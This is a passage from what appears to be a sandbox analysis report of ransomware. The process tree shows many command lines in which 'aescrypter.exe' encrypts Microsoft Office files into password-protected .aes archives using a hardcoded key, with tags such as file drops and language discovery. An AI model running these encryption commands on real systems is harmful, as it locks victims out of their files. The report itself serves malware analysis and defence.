  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1740
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2528
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2112
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2464
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:528
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:980
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1140
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1800
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:448
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2496
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2556
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1868
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2508
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1532
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:604
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2196
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1692
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1936
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1732
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2888
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHPHN.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHPHN.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1580
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2864
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSOSEC.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSOSEC.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:936
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2964
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRMV.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRMV.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2728
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1488
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2200
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImages.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImages.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2096
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2480
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2376
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1316
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2812
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2980
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2744
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1512
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1728
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2916
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIP.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIP.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2840
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2180
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:316
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2192
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2408
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2404
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3032
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3004
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2464
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1576
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1608
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1140
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1800
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1912
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2188
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2496
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2556
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1948
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2452
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1752
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1836
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1932
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1936
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1732
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2312
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:580
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2864
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24Images.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24Images.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2080
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\SketchIconImages.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\SketchIconImages.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2964
